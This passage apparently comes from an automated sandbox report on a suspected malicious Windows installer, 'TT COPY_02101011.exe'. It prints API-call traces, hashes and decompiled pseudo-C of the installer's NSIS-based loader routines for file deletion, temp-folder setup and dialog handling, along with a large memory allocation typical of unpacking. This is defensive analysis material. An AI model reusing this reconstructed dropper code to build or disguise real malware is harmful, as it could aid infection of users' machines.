                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000,00000000), ref: 00403300
                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000,00000000), ref: 0040330C
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                                • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                                • CopyFileA.KERNEL32 ref: 0040337D
                                                • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                                • ExitProcess.KERNEL32 ref: 0040345E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\TT COPY_02101011.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TT COPY_02101011.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$pewdd Setup$~nsu.tmp
                                                • API String ID: 2278157092-1552463313
                                                • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                                • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				struct _WIN32_FIND_DATAA _v332;
                                                				signed int _t37;
                                                				char* _t49;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t65;
                                                				signed int _t68;
                                                				CHAR* _t70;
                                                				CHAR* _t72;
                                                				char* _t75;
                                                
                                                				_t72 = _a4;
                                                				_t37 = E004054FF(__eflags, _t72);
                                                				_v12 = _t37;
                                                				if((_a8 & 0x00000008) != 0) {
                                                					_t63 = DeleteFileA(_t72); // executed
                                                					asm("sbb eax, eax");
                                                					_t65 =  ~_t63 + 1;
                                                					 *0x42ebe8 =  *0x42ebe8 + _t65;
                                                					return _t65;
                                                				}
                                                				_t68 = _a8 & 0x00000001;
                                                				__eflags = _t68;
                                                				_v8 = _t68;
                                                				if(_t68 == 0) {
                                                					L5:
                                                					E0040592B(0x42afe0, _t72);
                                                					__eflags = _t68;
                                                					if(_t68 == 0) {
                                                						E00405465(_t72);
                                                					} else {
                                                						lstrcatA(0x42afe0, "\\*.*");
                                                					}
                                                					__eflags =  *_t72;
                                                					if( *_t72 != 0) {
                                                						L10:
                                                						lstrcatA(_t72, 0x40900c);
                                                						L11:
                                                						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                                                						__eflags = _t37 - 0xffffffff;
                                                						_a4 = _t37;
                                                						if(_t37 == 0xffffffff) {
                                                							L29:
                                                							__eflags = _v8;
                                                							if(_v8 != 0) {
                                                								_t31 = _t70 - 1;
                                                								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                								__eflags =  *_t31;
                                                							}
                                                							goto L31;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							_t75 =  &(_v332.cFileName);
                                                							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                                                							__eflags =  *_t49;
                                                							if( *_t49 != 0) {
                                                								__eflags = _v332.cAlternateFileName;
                                                								if(_v332.cAlternateFileName != 0) {
                                                									_t75 =  &(_v332.cAlternateFileName);
                                                								}
                                                							}
                                                							__eflags =  *_t75 - 0x2e;
                                                							if( *_t75 != 0x2e) {
                                                								L19:
                                                								E0040592B(_t70, _t75);
                                                								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                									E004055E3(_t72);
                                                									_t52 = DeleteFileA(_t72);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E00404CC9(0xfffffff2, _t72);
                                                									} else {
                                                										__eflags = _a8 & 0x00000004;
                                                										if((_a8 & 0x00000004) == 0) {
                                                											 *0x42ebe8 =  *0x42ebe8 + 1;
                                                										} else {
                                                											E00404CC9(0xfffffff1, _t72);
                                                											_push(0);
                                                											_push(_t72);
                                                											E00405679();
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405250(_t70, __eflags, _t72, _a8);
                                                									}
                                                								}
                                                								goto L27;
                                                							}
                                                							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                							__eflags = _t61;
                                                							if(_t61 == 0) {
                                                								goto L27;
                                                							}
                                                							__eflags = _t61 - 0x2e;
                                                							if(_t61 != 0x2e) {
                                                								goto L19;
                                                							}
                                                							__eflags =  *((char*)(_t75 + 2));
                                                							if( *((char*)(_t75 + 2)) == 0) {
                                                								goto L27;
                                                							}
                                                							goto L19;
                                                							L27:
                                                							_t55 = FindNextFileA(_a4,  &_v332);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t37 = FindClose(_a4);
                                                						goto L29;
                                                					}
                                                					__eflags =  *0x42afe0 - 0x5c;
                                                					if( *0x42afe0 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t37;
                                                					if(_t37 == 0) {
                                                						L31:
                                                						__eflags = _v8;
                                                						if(_v8 == 0) {
                                                							L39:
                                                							return _t37;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t37 = E00405C22(_t72);
                                                							__eflags = _t37;
                                                							if(_t37 == 0) {
                                                								goto L39;
                                                							}
                                                							E0040541E(_t72);
                                                							E004055E3(_t72);
                                                							_t37 = RemoveDirectoryA(_t72);
                                                							__eflags = _t37;
                                                							if(_t37 != 0) {
                                                								return E00404CC9(0xffffffe5, _t72);
                                                							}
                                                							__eflags = _a8 & 0x00000004;
                                                							if((_a8 & 0x00000004) == 0) {
                                                								goto L33;
                                                							}
                                                							E00404CC9(0xfffffff1, _t72);
                                                							_push(0);
                                                							_push(_t72);
                                                							return E00405679();
                                                						}
                                                						L33:
                                                						 *0x42ebe8 =  *0x42ebe8 + 1;
                                                						return _t37;
                                                					}
                                                					__eflags = _a8 & 0x00000002;
                                                					if((_a8 & 0x00000002) == 0) {
                                                						goto L31;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 0040526E
                                                • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004052B8
                                                • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004052D9
                                                • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004052DF
                                                • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004052F0
                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                                • FindClose.KERNEL32(?), ref: 004053B3
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                                                • "C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 0040525A
                                                • \*.*, xrefs: 004052B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3350246413
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405C49(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				CHAR* _t7;
                                                				signed int _t9;
                                                
                                                				_t9 = _a4 << 3;
                                                				_t7 =  *(_t9 + 0x4091f8);
                                                				_t5 = GetModuleHandleA(_t7);
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                                                				}
                                                				_t5 = LoadLibraryA(_t7); // executed
                                                				if(_t5 != 0) {
                                                					goto L2;
                                                				}
                                                				return _t5;
                                                			}







                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405C22(CHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x42c028;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 00405C2D
                                                • FindClose.KERNEL32(00000000), ref: 00405C39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 1000BF66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: AllocVirtual
                                                • API String ID: 4275171209-1562549867
                                                • Opcode ID: ed7aadfc745ad77530b252efc6c5d5ee09691a9951460c8ada8f397f2a315cdf
                                                • Instruction ID: 086467a517098afc963b3fce9be205df0339728a6615016d0f3f9194adc49a5d
                                                • Opcode Fuzzy Hash: ed7aadfc745ad77530b252efc6c5d5ee09691a9951460c8ada8f397f2a315cdf
                                                • Instruction Fuzzy Hash: E0144A1090DBEAC8DB32823C5C587CDAE611B23225F4843D9D1FC2A6D6C7B50B96DF66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                				struct HWND__* _v32;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t35;
                                                				signed int _t37;
                                                				signed int _t39;
                                                				intOrPtr _t44;
                                                				struct HWND__* _t49;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t115;
                                                				signed int _t116;
                                                				int _t117;
                                                				signed int _t122;
                                                				struct HWND__* _t125;
                                                				struct HWND__* _t126;
                                                				int _t127;
                                                				long _t130;
                                                				int _t132;
                                                				int _t133;
                                                				void* _t134;
                                                				void* _t142;
                                                
                                                				_t115 = _a8;
                                                				if(_t115 == 0x110 || _t115 == 0x408) {
                                                					_t35 = _a12;
                                                					_t125 = _a4;
                                                					__eflags = _t115 - 0x110;
                                                					 *0x429fbc = _t35;
                                                					if(_t115 == 0x110) {
                                                						 *0x42eb68 = _t125;
                                                						 *0x429fd0 = GetDlgItem(_t125, 1);
                                                						_t91 = GetDlgItem(_t125, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x428f98 = _t91;
                                                						E00403CDD(_t125);
                                                						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
                                                						 *0x42e32c = E0040140B(4);
                                                						_t35 = 1;
                                                						__eflags = 1;
                                                						 *0x429fbc = 1;
                                                					}
                                                					_t122 =  *0x40919c; // 0xffffffff
                                                					_t133 = 0;
                                                					_t130 = (_t122 << 6) +  *0x42eb80;
                                                					__eflags = _t122;
                                                					if(_t122 < 0) {
                                                						L34:
                                                						E00403D29(0x40b);
                                                						while(1) {
                                                							_t37 =  *0x429fbc;
                                                							 *0x40919c =  *0x40919c + _t37;
                                                							_t130 = _t130 + (_t37 << 6);
                                                							_t39 =  *0x40919c; // 0xffffffff
                                                							__eflags = _t39 -  *0x42eb84; // 0x2
                                                							if(__eflags == 0) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x42e32c - _t133; // 0x0
                                                							if(__eflags != 0) {
                                                								break;
                                                							}
                                                							_t44 =  *0x42eb84; // 0x2
                                                							__eflags =  *0x40919c - _t44; // 0xffffffff
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t116 =  *(_t130 + 0x14);
                                                							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00403CDD(_t125);
                                                							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00403CDD(_t125);
                                                							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00403CDD(_t125);
                                                							_t49 = GetDlgItem(_t125, 3);
                                                							__eflags =  *0x42ebec - _t133; // 0x0
                                                							_v32 = _t49;
                                                							if(__eflags != 0) {
                                                								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t116;
                                                							}
                                                							ShowWindow(_t49, _t116 & 0x00000008);
                                                							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                							E00403CFF(_t116 & 0x00000002);
                                                							_t117 = _t116 & 0x00000004;
                                                							EnableWindow( *0x428f98, _t117);
                                                							__eflags = _t117 - _t133;
                                                							if(_t117 == _t133) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t133);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                							__eflags =  *0x42ebec - _t133; // 0x0
                                                							if(__eflags == 0) {
                                                								_push( *0x429fd0);
                                                							} else {
                                                								SendMessageA(_t125, 0x401, 2, _t133);
                                                								_push( *0x428f98);
                                                							}
                                                							E00403D12();
                                                							E0040592B(0x429fd8, "pewdd Setup");
                                                							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                							SetWindowTextA(_t125, 0x429fd8);
                                                							_push(_t133);
                                                							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t130 - _t133;
                                                								if( *_t130 == _t133) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t130 + 4) - 5;
                                                								if( *(_t130 + 4) != 5) {
                                                									DestroyWindow( *0x42e338);
                                                									 *0x4297a8 = _t130;
                                                									__eflags =  *_t130 - _t133;
                                                									if( *_t130 <= _t133) {
                                                										goto L58;
                                                									}
                                                									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                                                									__eflags = _t73 - _t133;
                                                									 *0x42e338 = _t73;
                                                									if(_t73 == _t133) {
                                                										goto L58;
                                                									}
                                                									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                									_push(6);
                                                									E00403CDD(_t73);
                                                									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                									ScreenToClient(_t125, _t134 + 0x10);
                                                									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                									_push(_t133);
                                                									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                									__eflags =  *0x42e32c - _t133; // 0x0
                                                									if(__eflags != 0) {
                                                										goto L61;
                                                									}
                                                									ShowWindow( *0x42e338, 8);
                                                									E00403D29(0x405);
                                                									goto L58;
                                                								}
                                                								__eflags =  *0x42ebec - _t133; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L61;
                                                								}
                                                								__eflags =  *0x42ebe0 - _t133; // 0x0
                                                								if(__eflags != 0) {
                                                									continue;
                                                								}
                                                								goto L61;
                                                							}
                                                						}
                                                						DestroyWindow( *0x42e338);
                                                						 *0x42eb68 = _t133;
                                                						EndDialog(_t125,  *0x4293a0);
                                                						goto L58;
                                                					} else {
                                                						__eflags = _t35 - 1;
                                                						if(_t35 != 1) {
                                                							L33:
                                                							__eflags =  *_t130 - _t133;
                                                							if( *_t130 == _t133) {
                                                								goto L61;
                                                							}
                                                							goto L34;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L33;
                                                						}
                                                						SendMessageA( *0x42e338, 0x40f, 0, 1);
                                                						__eflags =  *0x42e32c - _t133; // 0x0
                                                						return 0 | __eflags == 0x00000000;
                                                					}
                                                				} else {
                                                					_t125 = _a4;
                                                					_t133 = 0;
                                                					if(_t115 == 0x47) {
                                                						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                                                					}
                                                					if(_t115 == 5) {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                                                					}
                                                					if(_t115 != 0x40d) {
                                                						__eflags = _t115 - 0x11;
                                                						if(_t115 != 0x11) {
                                                							__eflags = _t115 - 0x111;
                                                							if(_t115 != 0x111) {
                                                								L26:
                                                								return E00403D44(_t115, _a12, _a16);
                                                							}
                                                							_t132 = _a12 & 0x0000ffff;
                                                							_t126 = GetDlgItem(_t125, _t132);
                                                							__eflags = _t126 - _t133;
                                                							if(_t126 == _t133) {
                                                								L13:
                                                								__eflags = _t132 - 1;
                                                								if(_t132 != 1) {
                                                									__eflags = _t132 - 3;
                                                									if(_t132 != 3) {
                                                										_t127 = 2;
                                                										__eflags = _t132 - _t127;
                                                										if(_t132 != _t127) {
                                                											L25:
                                                											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                                                											goto L26;
                                                										}
                                                										__eflags =  *0x42ebec - _t133; // 0x0
                                                										if(__eflags == 0) {
                                                											_t99 = E0040140B(3);
                                                											__eflags = _t99;
                                                											if(_t99 != 0) {
                                                												goto L26;
                                                											}
                                                											 *0x4293a0 = 1;
                                                											L21:
                                                											_push(0x78);
                                                											L22:
                                                											E00403CB6();
                                                											goto L26;
                                                										}
                                                										E0040140B(_t127);
                                                										 *0x4293a0 = _t127;
                                                										goto L21;
                                                									}
                                                									__eflags =  *0x40919c - _t133; // 0xffffffff
                                                									if(__eflags <= 0) {
                                                										goto L25;
                                                									}
                                                									_push(0xffffffff);
                                                									goto L22;
                                                								}
                                                								_push(_t132);
                                                								goto L22;
                                                							}
                                                							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                							_t103 = IsWindowEnabled(_t126);
                                                							__eflags = _t103;
                                                							if(_t103 == 0) {
                                                								goto L61;
                                                							}
                                                							goto L13;
                                                						}
                                                						SetWindowLongA(_t125, _t133, _t133);
                                                						return 1;
                                                					} else {
                                                						DestroyWindow( *0x42e338);
                                                						 *0x42e338 = _a12;
                                                						L58:
                                                						if( *0x42afd8 == _t133) {
                                                							_t142 =  *0x42e338 - _t133; // 0x0
                                                							if(_t142 != 0) {
                                                								ShowWindow(_t125, 0xa);
                                                								 *0x42afd8 = 1;
                                                							}
                                                						}
                                                						L61:
                                                						return 0;
                                                					}
                                                				}
                                                			}
































                                                0x00403913
                                                0x00403913
                                                0x00000000
                                                0x00403913
                                                0x00403906
                                                0x0040390b
                                                0x00000000
                                                0x0040390b
                                                0x004038ea
                                                0x004038f0
                                                0x00000000
                                                0x00000000
                                                0x004038f2
                                                0x00000000
                                                0x004038f2
                                                0x004038e2
                                                0x00000000
                                                0x004038e2
                                                0x004038c8
                                                0x004038cf
                                                0x004038d5
                                                0x004038d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038d7
                                                0x00403893
                                                0x00000000
                                                0x00403871
                                                0x00403877
                                                0x00403881
                                                0x00403c87
                                                0x00403c8d
                                                0x00403c8f
                                                0x00403c95
                                                0x00403c9a
                                                0x00403ca0
                                                0x00403ca0
                                                0x00403c95
                                                0x00403caa
                                                0x00000000
                                                0x00403caa
                                                0x0040386f

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                                • ShowWindow.USER32(?), ref: 00403863
                                                • DestroyWindow.USER32 ref: 00403877
                                                • SetWindowLongA.USER32 ref: 00403893
                                                • GetDlgItem.USER32 ref: 004038B4
                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                                                • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                                • GetDlgItem.USER32 ref: 0040397D
                                                • GetDlgItem.USER32 ref: 00403987
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                                                • GetDlgItem.USER32 ref: 00403A98
                                                • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                                • EnableWindow.USER32(?,?), ref: 00403ACB
                                                • EnableWindow.USER32(?,?), ref: 00403AE6
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                                • EnableMenuItem.USER32 ref: 00403B03
                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                                                • lstrlenA.KERNEL32(00429FD8,?,00429FD8,pewdd Setup), ref: 00403B57
                                                • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                                • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                • String ID: pewdd Setup
                                                • API String ID: 4050669955-950259615
                                                • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                                • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00403489() {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				int _v16;
                                                				char _v20;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t20;
                                                				signed int _t24;
                                                				void* _t28;
                                                				void* _t30;
                                                				int _t31;
                                                				void* _t34;
                                                				struct HINSTANCE__* _t37;
                                                				int _t38;
                                                				intOrPtr _t39;
                                                				int _t42;
                                                				intOrPtr _t59;
                                                				char _t61;
                                                				CHAR* _t63;
                                                				signed char _t67;
                                                				struct HINSTANCE__* _t75;
                                                				CHAR* _t78;
                                                				intOrPtr _t80;
                                                				CHAR* _t85;
                                                
                                                				_t80 =  *0x42eb70; // 0x571350
                                                				_t20 = E00405C49(6);
                                                				_t87 = _t20;
                                                				if(_t20 == 0) {
                                                					_t78 = 0x429fd8;
                                                					"1033" = 0x7830;
                                                					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                                                					__eflags =  *0x429fd8;
                                                					if(__eflags == 0) {
                                                						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                                                					}
                                                					lstrcatA("1033", _t78);
                                                				} else {
                                                					E00405889("1033",  *_t20() & 0x0000ffff);
                                                				}
                                                				E0040373D(_t75, _t87);
                                                				_t24 =  *0x42eb78; // 0x80
                                                				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                				 *0x42ebe0 = _t24 & 0x00000020;
                                                				if(E004054FF(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                					L16:
                                                					if(E004054FF(_t95, _t84) == 0) {
                                                						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                                					}
                                                					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
                                                					 *0x42e348 = _t28;
                                                					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t30 = E0040373D(_t75, __eflags);
                                                							__eflags =  *0x42ec00; // 0x0
                                                							if(__eflags != 0) {
                                                								_t31 = E00404D9B(_t30, 0);
                                                								__eflags = _t31;
                                                								if(_t31 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x42e32c; // 0x0
                                                								if(__eflags == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x429fb0, 5); // executed
                                                							_t37 = LoadLibraryA("RichEd20"); // executed
                                                							__eflags = _t37;
                                                							if(_t37 == 0) {
                                                								LoadLibraryA("RichEd32");
                                                							}
                                                							_t85 = "RichEdit20A";
                                                							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								GetClassInfoA(0, "RichEdit", 0x42e300);
                                                								 *0x42e324 = _t85;
                                                								RegisterClassA(0x42e300);
                                                							}
                                                							_t39 =  *0x42e340; // 0x0
                                                							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                                                							E0040140B(5);
                                                							return _t42;
                                                						}
                                                						L22:
                                                						_t34 = 2;
                                                						return _t34;
                                                					} else {
                                                						_t75 =  *0x42eb60; // 0x400000
                                                						 *0x42e314 = _t28;
                                                						_v20 = 0x624e5f;
                                                						 *0x42e304 = E00401000;
                                                						 *0x42e310 = _t75;
                                                						 *0x42e324 =  &_v20;
                                                						if(RegisterClassA(0x42e300) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 =  &_v16; // 0x624e5f
                                                						SystemParametersInfoA(0x30, 0, _t12, 0);
